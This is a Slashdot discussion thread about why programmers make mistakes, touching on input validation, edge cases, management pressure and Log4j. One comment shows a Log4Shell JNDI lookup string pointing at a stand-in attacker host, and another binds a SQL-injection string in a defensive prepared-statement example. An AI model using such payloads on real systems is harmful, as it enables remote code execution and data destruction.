Ask Slashdot: Why Do Programmers Make So Many Mistakes? (codinghorror.com) 391

A technical question occurred to Slashdot reader OneHundredAndTen when filling out forms online. "Are the programmers responsible for them stupid, incompetent, lazy, or all rolled into one?"

They provided two real-world examples that inspired the question:

- "I made up a company name that happened to contain a digit. When I submitted the information I got a big fat error diagnostic about this box, to the effect that numerals are not allowed in a company name. So you know, people â" no digits allowed in your company's name, or else!"

- "In a free text box limited to 1,000 characters (already stupid, arguably) the caption explicitly banned the following characters in the "free text" because they can interfere with the correct processing of input..."

~!@#$%^&*()|'

This prompted a response from UnknownSoldier (Slashdot reader #67,820), who shared the humorous "Murphy's Computer Law" aphorisms from 1984, calling them "sadly still appropriate" and citing one in particular: "There's never time to do it right, but always time to do it over." In general, web programmers tend to be extremely lazy (undisciplined). They don't value correctness because that would take "work". I'm not just singling out web programmers here; look at how many programmers fuck up the TRIVIAL example of FizzBuzz.
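
For reference, the whole exercise is a handful of lines; a minimal Java sketch of the classic FizzBuzz rules (multiples of 3 print "Fizz", multiples of 5 print "Buzz", multiples of both print "FizzBuzz"):

    public class FizzBuzz {
        public static void main(String[] args) {
            for (int i = 1; i <= 100; i++) {
                if (i % 15 == 0)     System.out.println("FizzBuzz"); // divisible by both 3 and 5
                else if (i % 3 == 0) System.out.println("Fizz");
                else if (i % 5 == 0) System.out.println("Buzz");
                else                 System.out.println(i);
            }
        }
    }

The usual stumble is ordering: the 15 case has to be tested before the 3 and 5 cases, or it is never reached.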

For example, here are two lists documenting the assumptions incompetent programmers make:

* Falsehoods programmers believe about names
* Falsehoods programmers believe about time

As they say, the devil is in the details, or the edge cases, as it may be. Programming is littered with edge cases, so bad programmers "stick their head in the sand and ignore the problem, hoping it will go away."

Doing it right costs time, money, and skill. Management is partially to blame. Bad programmers are to blame. Schools are to blame. There are many factors in why we end up with shit software like the use case you just described.

And now you know why old programmers become grumpy. Modern software is slow, bloated, with layers of abstraction piled upon abstraction, library upon library. You spend more time "decoding" code and reverse engineering what was done because no one ever took the time to comment it properly for the next guy.

Use these examples of "stupid shit" to be a better programmer.

Agree? Disagree? Share your own thoughts in the comments.

  • Two reasons (Score:5, Insightful)

    by phantomfive ( 622387 ) on Monday January 10, 2022 @12:37AM (#62158811) Journal

    1) Programmers don't care. You'd be surprised how many people say things like, "Bugs don't matter" or "we'll fix it in production." Managers who push deadlines over quality aren't helping here.

    2) A lot of programmers do care. For them, it's inexperience. If they are keeping track of their bugs, and fixing them, you'll find that with experience, the number of bugs they produce goes down quite a bit.

    • Re:Two reasons (Score:5, Interesting)

      by fermion ( 181285 ) on Monday January 10, 2022 @01:43AM (#62158921) Homepage Journal
      In fantasy land, perfect solutions exist. For the rest of us, a balance has to be reached. A child is going to whine that there are not unlimited resources to buy all the toys they want. An adult has hopefully learned not to melt down because they cannot have a new toy.

      Input validation is expensive, and real mistakes are serious, leading to vulnerabilities that most users find more serious than excessive limits on names, as shown in XKCD #327. Samsung does not allow special characters in names. I think it is stupid, but they may have a good reason.

      The balance for online resources is customer acquisition versus security and reliability. It is easy to set off, for example, /.'s anti-ASCII-art protection. Any site that protects against malevolent input is going to be annoying. There is a nominal cost to storing and vetting input, so maybe 1,000 characters is the balance between cost and user experience.

      From a business point of view, if there are no negative consequences, handling edge cases may not be viable. It is not required that every business serve every customer. If someone wants a number in their name, I am not legally required to adjust my model to accommodate them. I am free to do so, but only if I wish.

      • Re: (Score:3, Insightful)

        by phantomfive ( 622387 )

        Input validation is expensive

        It really isn't, it's a solved problem.

        • Re:Two reasons (Score:4, Insightful)

          by Mr0bvious ( 968303 ) on Monday January 10, 2022 @02:03AM (#62158995)

          Yes, but those who understand that are more expensive than those who don't.
          It's nearly always about cost. The way that manifests is different in each case, but it's the cost.

          • Log4j is a solved problem, too. The solution is: don't use it. Remove it. There is going to be a long list of vulns in Log4j for many months, if not years. It's not secure.

            • Log4j is a solved problem, too. The solution is: don't use it. Remove it. There is going to be a long list of vulns in Log4j for many months, if not years. It's not secure.

              I thought the list was very short: if you log anything that looks like a URL in a certain format, the bloody logger will go to the website of the URL, download Java code, and execute it.

              Now if I can tell a programmer "shoot yourself in the foot" and he or she just does it, is that a vulnerability? Log4j works exactly as intended.
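
              To make the foot-gun concrete, here is a sketch of the Log4Shell pattern (this assumes a vulnerable Log4j 2.x, before 2.15.0, on the classpath; the attacker host is illustrative):

                  import org.apache.logging.log4j.LogManager;
                  import org.apache.logging.log4j.Logger;

                  public class LookupDemo {
                      private static final Logger log = LogManager.getLogger(LookupDemo.class);

                      public static void main(String[] args) {
                          // Attacker-controlled input, e.g. an HTTP User-Agent header.
                          String userInput = "${jndi:ldap://attacker.example/a}";
                          // On vulnerable versions, message-lookup substitution runs on the
                          // formatted message, contacts the LDAP server, and can end up
                          // executing remotely supplied code. Logging alone triggers it.
                          log.info("User-Agent: {}", userInput);
                      }
                  }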

        • Input validation is expensive

          It really isn't, it's a solved problem.

          Really?

          Just try to develop something as seemingly straightforward as reasonable input-sanitization rules that will successfully pass any legal email address but reject all illegal email addresses. It can be done, but it is far from trivial!

          • It is trivial; you pay money to someone who has spent the time, effort, and energy to do it right, and you write if(address.isValid(...)) { ... } and let someone who knows what they're doing do their job.
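
            For instance, a minimal sketch with Apache Commons Validator, one off-the-shelf library of the kind described here (the isValid call above is pseudocode; EmailValidator is a real class):

                import org.apache.commons.validator.routines.EmailValidator;

                public class EmailCheck {
                    public static void main(String[] args) {
                        // Let the library's accumulated edge-case knowledge do the work.
                        EmailValidator validator = EmailValidator.getInstance();
                        System.out.println(validator.isValid("first.last@example.com")); // true
                        System.out.println(validator.isValid("no-at-sign.example.com")); // false
                    }
                }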

            • It is trivial; you pay money to someone who has spent the time, effort, and energy to do it right, and you write if(address.isValid(...)) { ... } and let someone who knows what they're doing do their job.

              Which is exactly why someone used log4j and ended up vulnerable, whilst other people used Windows and ended up vulnerable. Choosing an outside library is a good place to start, but once you have done that, and before your software gets anywhere serious, you will want to have test cases for that library and audit both the code that's in it and the people who wrote the code. Do you have access to the source? If not, start again. Has the code been written to sensible standards? If not, start again. Do we know w

            • by DarkOx ( 621550 )

              Now let us imagine the library that provides .isValid() does its validation by reaching out to the remote mail server, doing a RCPT TO: or VRFY, and checking the response. Yes, there are libs that do that. If you dumbly use .isValid() without understanding that, bravo: your application has a DoS vulnerability and is potentially abusable for amplification attacks, unless you took some steps to ensure validation is rate limited in some way. We both know you did not; you decided the problem was trivial, typed 'n

        • by fuzzyf ( 1129635 )
          The problem isn't input validation. The problem is encoding data properly for the context in which it's used.

          For example:
          If you are using the data in a SQL statement, you need to encode all special characters that your DB is looking for (this is hopefully done by your ORM).
          If you are using data on a command line somewhere, then you need to encode all special characters for that context.
          If you are using data towards LDAP, or putting it in an XML file, or rendering it on an HTML page, or running a query towards a docum
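
          For the SQL case, parameter binding avoids hand-encoding entirely; a minimal JDBC sketch (the in-memory H2 database and the table are hypothetical, for illustration):

              import java.sql.Connection;
              import java.sql.DriverManager;
              import java.sql.PreparedStatement;
              import java.sql.ResultSet;

              public class CompanyLookup {
                  public static void main(String[] args) throws Exception {
                      try (Connection conn = DriverManager.getConnection("jdbc:h2:mem:demo")) {
                          conn.createStatement().execute(
                              "CREATE TABLE companies(id INT, name VARCHAR(100))");
                          // The driver ships the value separately from the SQL text, so
                          // quotes and semicolons in the input cannot change the query.
                          PreparedStatement ps = conn.prepareStatement(
                              "SELECT id FROM companies WHERE name = ?");
                          ps.setString(1, "Robert'); DROP TABLE companies;--");
                          try (ResultSet rs = ps.executeQuery()) {
                              System.out.println(rs.next() ? "found" : "no match");
                          }
                      }
                  }
              }
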
          • by DarkOx ( 621550 )

            Bingo. I have literally thrown security testing reports back in the face of practitioners who ought to know better when they recommended things like input validation as a response to a SQLi vulnerability.

            There are exactly three ways to handle inputs from unknown/untrusted sources:
            1) Validate - This is ONLY possible when the domain of valid inputs is highly restricted and fully known. You might be able to do this with something like a domestic postal code or if asking for a measure as some integer number of un

        • Input validation is not a "solved problem" and never can be because the range of inputs is never-ending and the rules for validating them are very often project-specific and poorly thought through. Input validation is not just a programming problem; it's a requirements specification, programming and testing problem.

          One of the articles linked in TFS furnishes a great example. Patrick McKenzie pours scorn on people who try to represent names in a database with first_name and last_name columns, but note that

          • by ibpooks ( 127372 )

            Very good points. To add an anecdote, I'm currently working on a project which automatically transfers and processes information about business licenses back and forth from one state government department database to another state government department database. This replaces a system which was largely manual.

            The exact issue of what is a valid business name was a huge thorn in my side for at least a month. The first department had their own notion -- can contain numbers or letters, but must have at least

        • by Erioll ( 229536 )

          And there's the heart of it: Not Invented Here Syndrome. They even give it fancy names like SOUP [fda.gov] (Software Of Unknown Provenance) and enforce it with regulations!

          This is as opposed to asking "how has this been solved before?" That should be the first question a programmer/engineer/architect/fancy_title_here poses when given a problem to solve. Instead, they think about how they will solve it themselves. And the knock-on effects of that lead to what we have today.

          This isn't to say we should blindly always go

        Are you sure? Re-check Falsehoods programmers believe about names [kalzumeus.com] and then tell me: what input validator will allow all names that occur "out in the wild" per the link, while preventing things that will outright break any system, and simultaneously fulfilling management's requirement that "the name field is mandatory"?

          Every single solution to this problem that exists currently is at least partially broken - either too restrictive, not allowing someone to enter their actual name, or too permissive,

    • by Roger W Moore ( 538166 ) on Monday January 10, 2022 @01:44AM (#62158927) Journal
      Actually, I would say it is just one reason: programming means writing something that has to be almost exactly correct, otherwise it is wrong and bad things may (or will) happen. This is incredibly hard for humans to do, since we are used to a more "fuzzy" environment where mistakes are made but, because we generally know what is meant, we can ignore or automatically correct them.

      The same happens with human languages when you have to be exactly correct. Try writing a science paper, or worse a textbook, where you have to write down ideas and facts perfectly correctly, and you run into the same problem. It is insanely easy to misstate something, state it in a misleading way, or miss a word that completely changes the meaning. Even if you are trying to be careful it is ridiculously easy for mistakes to creep in... and that's with human language, so why should programming be any different?
      Exactly this. Programmers likely make fewer mistakes than most other professions.
        The problem is that programming languages are extremely brittle.
        If you forget to put on your blinker when changing lanes, it rarely results in a crash.
        If you forget a semicolon, it almost always results in a crash.
        Most other professions, whether you are a carpenter, plumber, or even doctor, have a much higher tolerance for small mistakes than programming.

    • There's another reason: burnout. Sometimes programmers are so burnt out that if they come across a problem that requires thinking, they don't have enough energy left to nut it out. Cue just going to Stack Overflow looking for the solution, and if it isn't there, just typing in the easiest shortcut that comes to mind.
    • An alternative two reasons:

      1) Quality software takes time and money.
      2) People want software in little time and for little money.

    • by fazig ( 2909523 )
      From personal experience with programming physics simulations over the last couple of years: Things can get extremely complex quickly, where everything turns into differential equation systems.
      Divide-and-conquer approaches aren't always sufficient when things are highly interactive, because issues emerge from the interactions themselves. Sometimes it takes extensive and structured field testing and thorough documentation to track things down. Excruciating work for many.

      I had to learn the value of documentation the hard way due to
      • Things can get extremely complex quickly, where everything turns into differential equation systems.

        There the primary problem is to make sure you have clear requirements (you need to be 100% sure what equation you are implementing), and interfaces between components need to be very well defined (probably a functional style will be easiest here).
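
        As one concrete reading of "functional style with well-defined interfaces": pass the ODE dy/dt = f(t, y) as a pure function into a fixed-step integrator, so the equation being implemented is visible in one place. A minimal Euler sketch (the equation and step count are illustrative):

            import java.util.function.DoubleBinaryOperator;

            public class EulerDemo {
                // dy/dt = f(t, y); the interface is the requirement: one equation, one function.
                static double euler(DoubleBinaryOperator f, double y0,
                                    double t0, double t1, int steps) {
                    double h = (t1 - t0) / steps, y = y0, t = t0;
                    for (int i = 0; i < steps; i++) {
                        y += h * f.applyAsDouble(t, y); // one explicit Euler step
                        t += h;
                    }
                    return y;
                }

                public static void main(String[] args) {
                    // Example: dy/dt = -y, y(0) = 1; the exact answer at t = 1 is e^(-1).
                    double y1 = euler((t, y) -> -y, 1.0, 0.0, 1.0, 1000);
                    System.out.println("y(1) ~ " + y1 + " (exact: " + Math.exp(-1) + ")");
                }
            }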

        • by fazig ( 2909523 )
          I think the primary problem is that you don't know your ass from a hole in the ground when it comes to complex software.
          • Well, you're wrong. I'll bet you're used to that, though.

            • by fazig ( 2909523 )
              Sure, that's why I always double and triple check.
              You check, identify the mistake, correct it if possible, and move on. Very normal for people that actually work in the field of science.

              Though when people suggest that there's a fairly straight and simple approach one just has to take to notoriously difficult issues, without asking for further elaboration of the specifics, I'm inclined to think they're a case of the Dunning-Kruger effect at work.


              As a matter of fact, writing solid software can be qui
              • Seems like you're having a bad day.

                • by fazig ( 2909523 )
                  Just a normal day on the internet, dealing with people who come off like they know everything.
                  If I remember correctly you were also the person who suggested that hypercomplex numbers are actually quite simple. Which either means you're one of the smartest people on the entire planet, or you might be overestimating the extent of your abilities at least a bit.

                  Besides that, I mean, I do agree with your original post.
                  It's inexperience in many cases, and management doesn't help either, while some people jus
    • (3) The darned computer keeps doing exactly what I told it to do, not what I meant!

      These days I believe that's the overwhelming cause of problems, but in the old days there were far more bugs at higher levels that could take some of the blame. Yeah, modern OSes, interpreters, and compilers still have plenty of bugs, but they are much harder to stumble over now. Let's have a cheer for code bloat?

      However, upon reflection I think there's at least one more reason worth listing:

      (4) Code modules that don't play n

  • The ban on certain characters would discriminate against the Irish, among others.

    Just hope that Ronnie O'Sullivan doesn't encounter this; he has enough money to pay a good lawyer.

    But the character restriction also tells me about the Bobby Tables [xkcd.com] problem.

    • by Mal-2 ( 675116 )

      Also whenever he retires, maybe he can be the replacement "smug because he really is better than you" host over at Top Gear.

  • by EnigmaticSource ( 649695 ) on Monday January 10, 2022 @12:47AM (#62158821)

    Honestly, I think the philosophy of software engineering has gone wrong. Not that I don't appreciate automagic (I specialize in crafting it), but in our grand quest to be "better" we keep gluing features on through libraries and not through understanding. Between that and a generation of people who learnt to code through copy and paste, what did you expect would happen?

    If I could change anything, it would be to disable Ctrl+V. Not that great minds don't copy, but there is a sublime value in typing out something verbatim... it makes you think just a little more. If I got a second wish, it would be that we should fully re-embrace abstraction, the Unix way: do one thing, really well, and embrace a common interface. It's not technically infeasible; we've been doing the cloud right since System V. Somehow we just lost our way.

    Meh, I think I'll go meditate some more.

    • by shadeyk ( 697658 ) on Monday January 10, 2022 @01:49AM (#62158945)

      begin RANT...

      Divisions being run by managers who can't program and therefore don't appreciate the difficulties. Developers who don't understand test design. Product owners who have yet to realize they are the gatekeepers of quality. Salespeople in engineering management positions (e.g., none of AT&T DTV's CTOs were really CTOs) making decisions from a salesperson's perspective. Management letting marketing people set deadlines. Developers who become jaded because they're always working on defects and not new code. Coaches who are useless at understanding the cause of poor development practices... the list goes on. End result: large numbers of developers post-'98 don't have the tools, nor the desire to learn those tools, to produce a quality body of work.

      To understand my POV... go back to the beginning of the SE as a career path (around the late 1960s). Programming was expensive, HARD, and expensive! Did I mention expense? The people that were doing it were incredibly smart in that regard, and if you met any of them today you would be taken aback by how smart, methinks. It's been going downhill ever since from my POV. I felt like a knucklehead compared to some of the older guys I had the privilege to work with.

      Languages evolved to make it easier and more cost friendly.

      FORTRAN/COBOL on punch cards?
      APL using symbols and requiring special keyboards.
      C with its buffer overflow issues that few understood well. Pointers, anyone?
      Few (if any) debuggers. And definitely no GUIs. All debugging was command line.

      The late '70s saw the emergence of the personal computer. Those of us that had access to whatever model began to see it as a viable career path. Schools had computer SCIENCE courses that actually taught it as a SCIENCE. My curriculum included language parsers, compilers, database design (not tables, the actual DB). We were taught everything from ASM, C, PASCAL, FORTRAN, APL, etc. Even machine language was part of one course. They still didn't teach test design, however (not sure why that went under the radar).

      By the late '80s there was an influx of software engineers who loved the craft aspect of it and wanted to understand the cause of defects getting through. The Gang of Four released their Design Patterns book in the early '90s, which, by then, introduced C++ and other object-oriented languages to the younger crowd. The CMM and other bodies conveyed how a well-established company could ensure some semblance of quality for its products. Source control, the beginning of build pipelines that included the running of unit tests to ensure no breakages (later evolved into CI), design reviews, code reviews, test design/code reviews, etc. became the norm in well-established teams. QA was there to measure the quality as it pertained to the customer POV. They were not the enemy but a collaborating division.

      I know I certainly began to feel like software development was finally enjoying the rigor and precision that other engineering disciplines had.

      And then came the .com explosion around '98, the influx of cheap programmers from other parts of the world who hadn't evolved with the same knowledge, and the use of non-software-engineers as their managers, all trying to launch an online presence ASAP.

      To do so, they threw out design/code/test reviews and unit testing (hell, Wells Fargo's online banking system was developed without unit tests because their development manager was convinced by the developers that QA did the testing). This saw the explosion of the "QA engineer" who did manual testing. And then along came SilkTest, WinRunner, etc., which promised managers that their manual testers could write tests (they couldn't) that would increase cost savings (they didn't). This then led to managers blaming QA for releasing a shit product. Those non-engineer managers didn't understand the difference between preventive tests and tests used to measure quality.

      Hell in 2004 Google had to invent the term So

        It's sad, but I started in the '80s and now I'm considered "Old Guard." I can tell you as someone that hacked BPL and FORTRAN on RSTS/E, the niceties of C weren't really even on the horizon for a good part of that decade, much less the '60s.

        I got my first modem so I could use someone else's C compiler, in 1989... that was my gateway drug to Unix, and it's been downhill from there.

        Otherwise, yeah, this right there, 100%. If you don't understand the actual full stack, from the metal up, you're not engineer

      • by mark-t ( 151149 )

        Stack-based buffer overflows could be mitigated by a CPU design that tags each machine word stored in memory with an auxiliary tag recording exactly how the data stored at that address came to be there (and perhaps even where it came from). Reading or modifying these tags would require a special mode in the CPU, which might use instructions ordinarily found only in kernel-level code.

        Ordinarily reading or modifying these tags would be done directly by the hardware, transparent to regul

  • Bad management (Score:5, Insightful)

    by drnb ( 2434720 ) on Monday January 10, 2022 @12:47AM (#62158823)

    Why Do Programmers Make So Many Mistakes?

    Bad management.

    Here is the secret to management: You get what you reward. Not the right thing. Not even the right thing your staff knows is the right thing to do. You get what you reward.

    Most managers reward perceived "progress." Look how fast so-and-so completes tasks on the current sprint. That person is a rock star; everyone should be like that person. And the manager never notices that, among the future tasks related to bugs, his rock star produces more bugs per completed task than anyone else. As the rock star continues to be rewarded, others adopt his methods: shortcutting testing; allowing bugs to exist so long as they don't manifest in a demo of a completed task's functionality, even new bugs introduced by the new code or newly reworked code. And if you can rework the demo to avoid the new bug, that's great, mission accomplished. Engineers who just fix it are effectively penalized as lower performers.

  • For some context from a programmer's viewpoint, here is something we deal with all the time.

    Say some operation at a company starts on June 2. Is that 12AM? Or start of business? Maybe it doesn't matter. So 12AM. Except it's company-wide, and the company has sites in five different time zones. So is that June 2 12AM at the same time for every site? That doesn't work either. The thing has to start at 12AM on June 2 for each site. So it's not really one operation, it's a separate operation for each site, becau

    • And then when you ask the manager to clarify, they just say, "Just make it work!!!" So you make the most sensible decision: if(date >= june 2) start = true. That is, go with whatever the server date is. :D And if someone else asks, you just point to the discussion and shrug. You've got more important features to implement.
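
    If the requirement really is "midnight June 2 at each site," java.time at least makes the per-site reading explicit. A minimal sketch (the zone list and year are illustrative):

        import java.time.LocalDate;
        import java.time.ZoneId;
        import java.time.ZonedDateTime;

        public class SiteStart {
            public static void main(String[] args) {
                LocalDate start = LocalDate.of(2022, 6, 2); // "June 2" from the requirement
                // One start per site: each zone gets its own midnight.
                String[] zones = { "America/New_York", "America/Chicago",
                                   "America/Denver", "America/Los_Angeles", "Pacific/Honolulu" };
                for (String z : zones) {
                    ZonedDateTime siteStart = start.atStartOfDay(ZoneId.of(z));
                    System.out.println(z + " -> " + siteStart.toInstant());
                }
            }
        }
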
    1. Managers care about getting something out the door RIGHT NOW, because his/her boss is asking when it'll be done, and so on up the chain.
    2. Managers look at TDD (Test-Driven Development) and say "This is not about implementing feature XYZ -- it's about writing tests. Stop it and go implement my feature!!"
    3. The senior programmer says that self-tests & TDD just clutter up the code, which is already impossible to read and maintain.
    4. Coders lack a "second pair of eyes". That's where pair programmin
  • by Anonymous Coward

    Humans make mistakes every day. That is a fact. The difference between a programmer and some other professions is that the code is deployed and exists. That means there's proof of the mistake. Look at all the social media posts on the internet: what percentage have typos and mistakes?

    Until humans stop being human, there will be bugs. I've been programming for over 23 years and contributing to open source for 20 years. A lot of people tell me "you're stupid for throwing money away." or "why are you letting companies e

  • This is just a rehash of the age old discussion of what makes programming so difficult and why software is so poorly written. Of course it's a combination of many factors: management, training, corporate culture, etc. How much each factor affects the outcome depends on where you work and what kind of education you have in engineering.
  • yeh... ever try using slashdot from an iPhone?
  • Computers are good at forcing you to lie to them.

    An easy example is address fields that have a mandatory 'State' field. News flash: not all countries have states. I would often use 'Bliss' as my state when the address didn't matter anyway. I pointed it out to one website owner, who then checked. He was amused at the answers he found in his database. He fixed his website to make that field optional in future.

    Worst is when it is a government system. Getting my driver's license in China, the system would not a
  • by jddj ( 1085169 ) on Monday January 10, 2022 @01:27AM (#62158883) Journal

    "Programmers solve problems they don't have."

    This aphorism, coined by my wife, a project manager at the time, neatly encapsulates a great deal about usability, user experience and software design.

    The programmer's task is to complete the programming for the form, but it's a form she's destined never to fill out in a real-world context.

    If the programmer is simply complying with requirements (a notably narrow and inadequate channel for communicating design intent), the P.O. who OK'd the requirements bears some responsibility.

    If the programmer never has to feel the pain of trying to enter "3com" or "Botany 500" in the "no digits in a company name" form, she'll never realize how much it sucks.

    In fact, if the form meets the requirements in this state, she may not be able to get the form fixed, even if she knows it should be.

  • Far too many businesses and managers are looking for the bottom line. We all know the adage "choose two", and lower up-front costs are a frequent decision with the natural consequences.
  • Because they don't do (obligatory in many *professional* fields) 100% line coverage and MC/DC unit tests.
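
    To illustrate the flavor (ordinary branch-level unit tests, not full MC/DC), here is a minimal JUnit 5 sketch, assuming JUnit 5 on the classpath and a company-name validator invented for the example:

        import static org.junit.jupiter.api.Assertions.assertFalse;
        import static org.junit.jupiter.api.Assertions.assertTrue;
        import org.junit.jupiter.api.Test;

        class CompanyNameValidatorTest {
            // Hypothetical validator under test: non-blank, at most 100 chars, digits allowed.
            static boolean isValidCompanyName(String name) {
                return name != null && !name.isBlank() && name.length() <= 100;
            }

            @Test void acceptsDigits()      { assertTrue(isValidCompanyName("3com")); }
            @Test void acceptsApostrophes() { assertTrue(isValidCompanyName("O'Sullivan Ltd")); }
            @Test void rejectsBlank()       { assertFalse(isValidCompanyName("   ")); }
            @Test void rejectsNull()        { assertFalse(isValidCompanyName(null)); }
        }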

  • Why do so many people suck at their chosen career?

    Because they "fell into it", as they had nothing better at the time?
    Because they figured it would make them money and that was the only motivation?

    There's lots of reasons, but I'd wager most of them are to do with lack of passion.

    The art of coding is so much harder than many understand. The way I see it, it's a little bit like chess.
    You have those who can "see" multiple moves ahead, either just naturals or those who have strived hard to reach that level.
    Then

    • I disagree with the thrust of your argument but not the outcome.

      I think getting that logical problem solving mindset is an ability you can learn. You can learn from an early age as you said, but it's not inherent. People can learn when they're older too.

      But you have to learn by doing it. If you're programming by copy pasting then that's what you're learning. Many of those crappy programmers could become good ones with application. They won't of course, but they could.
  • Honest answer: Lots of code is written by people who should never ever be allowed near a keyboard. But they write code because managers are cheap bastards who can't tell good code from bad code and will hire the cheapest copy and paste artist they can find. The only qualification you need to call yourself a programmer is that you program. Well, technically, but practically not even that.

  • It's a feature that sometimes generates ideas.

  • If you don't adequately specify the problem, you can't blame people for taking shortcuts within the inadequate or unspecified problem.

    Also, it is kind of hard to design and write good tests without a specification.

    • by Jeremi ( 14640 )

      If you don't adequately specify the problem, you can't blame people for taking shortcuts within the inadequate or unspecified problem.

      The counter-argument would be that one of the more important skills for a programmer to have is the ability to recognize when requirements are incomplete or ambiguous, and respond by communicating further with the customer as necessary until the requirements have been fleshed out properly.

      And of course the counter-counter argument is that sometimes the company/organization's structure doesn't allow for that sort of thing, in which case everybody is going to suffer in the end. :(

  • by blahplusplus ( 757119 ) on Monday January 10, 2022 @01:41AM (#62158917)

    ... as someone who's programmed for decades. The reality is the von Neumann machine model means compilers and programming languages are designed to conform to the hardware. The hardware model and software model itself is the issue.

    Think about the common "mistake" in C or C++ of "buffer overflows" that lead to remote code execution. The whole reason this can exist is because CPUs literally move from function to function by pointer. The CPU has no "awareness," like a human does, of whether a value is being faked; that's why you can't eliminate cheating in PC games, because at some point "the show must go on" and the CPU is going to tick down the stack to the next value.

    The entire computing infrastructure was not designed with anything like the internet in mind, so the whole notion of "software security" is bullshit.

    The reality is we are "cave men" at designing computers when it comes to technology. The reason isn't that programmers are bad; the reason is that the human brain was not designed to deal with the cognitive load that von Neumann-style chips impose.

    Every good programmer knows that programming languages are only a means to solve a problem. Eventually anyone who is serious about programming and getting good at it will take math or advanced university/computer science courses after they are done with university to further their learning, and also courses outside of computer science, aka anything related to problem solving more generally. All a programmer can do is convert the thinking in our heads into mathematical statements that fit a von Neumann-style machine.

    The revolution will come when programmers get back into hardware design, since they can see that just "playing at the edges" inventing new languages is not going to solve fundamental issues of how we want computers to actually behave.

    Remember, how current CPUs operate is just one kind of invention for a specific task by one small group of people. I've often thought that the future of computing is increased specialization of apps and hardware (imagine a computer designed JUST for text editing and code manipulation), aka bending the hardware and software toward how you'd like to use it.

    On modern systems we are bending our thoughts and trying to convert them into some intermediate language, which is then converted into assembly. I've always thought there are many more models of how a digital circuit can behave and be programmed than we've even begun to explore.

    AKA we must remember that things like ASCII or UTF-8 are just ONE small group of people's idea of how characters should be encoded for an electronic device.

    The design space is huge and beyond one human lifetime. I've thought that if I ever had to do it over again, I'd go into research. There's plenty of stuff that hasn't even been thought of or invented yet. One of the reasons "programming is hard" is because it is cognitively demanding: it forces you to make your thoughts rigorous, and most people don't have the fortitude or cognitive capacity to be good programmers. It's a cognitively demanding job if you take the profession and problem solving seriously.

    • And what, pray tell, do you have in mind to replace it? Harvard? Bovine Spongiform Whitespace? I hate to break it to you; but one of the fundamental rules of universal computing is that there is no computing machine that can validate all computable inputs.

      What you think you want to do can't, won't, and cannot work; and it's a dangerous fiction to imagine that someday it will. At the end of the day, the only solution is hard work and accepting that non-trivial things will contain unanticipated states; an

      • "And what, pray tell, do you have in mind to replace it? Harvard? Bovine Spongiform Whitespace? I hate to break it to you; but one of the fundamental rules of universal computing is that there is no computing machine that can validate all computable inputs."

        Sigh. Which has nothing to do with how CPUs were designed in such a way as to allow array overflows; i.e., there were no special values to mark memory as the end or beginning of an array. Think about parsing, for fuck's sake: the computer has no idea of th

          Somehow, you're imagining this great Harvard machine, with an immutable program register and the smarts to have logic encoded for every possible data structure that could be stored on its potentially infinite bitplane? Sounds great, but just one problem: if it's Turing complete, it will still have the same fundamental problem as a von Neumann state machine; full stop.

          You can keep abstracting all day long, but at the end of the day, it all comes down to brainfuck, or something close to it, and the halting p

    • Most programmers these days don't worry about any of the problems you've mentioned. Almost all of us use languages that don't allow buffer overflows, for example.

      • Most programmers these days don't worry about any of the problems you've mentioned. Almost all of us use languages that don't allow buffer overflows, for example.

        I know I picked low-hanging fruit; I used buffer overflows as an example of the CPU not having any "awareness" of where something begins or ends.

        For instance, when we write a value like an address or variable to memory, the data can be interpreted differently depending on what function is currently executing and what that function will use the value for. You may think this is a "no duh," and it is, but the whole issue is you can't query important facts about data or functions from the hardware under current vo

        • I don't know, I still feel like you're solving problems that most programmers in modern languages don't have.

          • I don't know, I still feel like you're solving problems that most programmers in modern languages don't have.

            They are just an example; the idea is we've barely begun to understand what the problems are. I think of it like this: programmers don't know what they don't know about programming. To quote Rumsfeld:

            "As we know, there are known knowns. There are things we know we know. We also know there are known unknowns. That is to say, we know there are some things we do not know. But there are also unknown unknowns — the ones we don't know we don't know," Rumsfeld said in 2002.

            I'm saying programming and hardware de

  • Why do programmers make so many mistakes? The lazy dumb fucks that hire them enable them. How? Well, first of all screen the fuckers. Just because a potential employee has talent, doesn't mean you should tolerate every childish character flaw. Oh, he doesn't believe in dress codes?...make him believe in them. Oh, he wants to stroll in late?...discipline him. Programming jobs are often adult day care...let's do some coding activity and then fuck off the rest of the day. It's considered a status symbo
  • This is by no means exclusive to the software industry. Nearby where I live, many years ago they built a Steak ‘N Shake with the back side of the restaurant facing the road. You’d think at some point during the planning or hell, even during the initial stages of construction, someone would’ve noticed all the other buildings in the plaza faced towards the road.

    Corporations are full of ass-kissing yes men who will happily build a building facing the wrong way. It’s no wonder the sof

    Most people have some inaccurate assumptions about various things. Indeed, the person blaming the "free text" restrictions on a "programmer" is likely making an inaccurate assumption; it is more likely the result of interaction with a web application firewall's heuristics, which is a more complex interplay between systems than can reasonably be described as an individual programmer's "mistake".

    It's just that the inaccurate assumptions of programmers can become enforced (and built on top of) whereas most pe
  • The linked examples about "falsehoods programmers believe about names and dates" say it all. A programmer can easily spend several days ensuring that the program handles names and dates correctly. When the boss asks "What's the progress this week?" and all you have to show is a name and date field, guess what's going to happen to your job.
    • Re:You are FIRED! (Score:4, Insightful)

      by EnigmaticSource ( 649695 ) on Monday January 10, 2022 @02:09AM (#62159009)

      I made a good chunk of my career on understanding the minutiae of calendars (1999 treated me very well); the blessing today is that unless you're dense, or intentionally obtuse, there's a well-tested library in your language.

      This is true of all trivial problems. What happens is people write and paste shitty code because they don't bother to ever understand it; and because they're not even bothering with understanding, they never stop to think whether there's a better way.

      Truth be told, I think we as a collective should spend much less of our time writing code with the mindset of solving a problem, and instead think of programming as a job where you're mostly gluing together working things and managing exceptional conditions, with novel code being the exception rather than the rule.

  • I have a conversation like this with my business folks at least once a year. Here's how I explain it to them:

    It's called "Writing software" or "coding," but at it's core, what it's really about is automating a business process. When you look at it as automating a business process, your work as a developer is dependant on the business process being well designed and equally well described by the SMEs. After all, you can't automate something that doesn't exist yet, right?

    Roughly speaking, our bugs fall into t

  • Everybody who makes anything, makes mistakes.

    Every house has flaws. Every road, every device, everything humans make has flaws.

    We programmers just happen to be close to code, so we have better visibility into programming mistakes.

  • by drkshadow ( 6277460 ) on Monday January 10, 2022 @01:58AM (#62158961)

    Remember back in 4th grade when you did that thing where someone is given explicit instructions - remove cap from jar (how? which way do we spin? do I pick the jar up first? do I turn the lid? what's the lid?)?

    Remember how if you missed a *SINGLE* step you'd be spreading the jelly on your hand as opposed to the slice of bread?

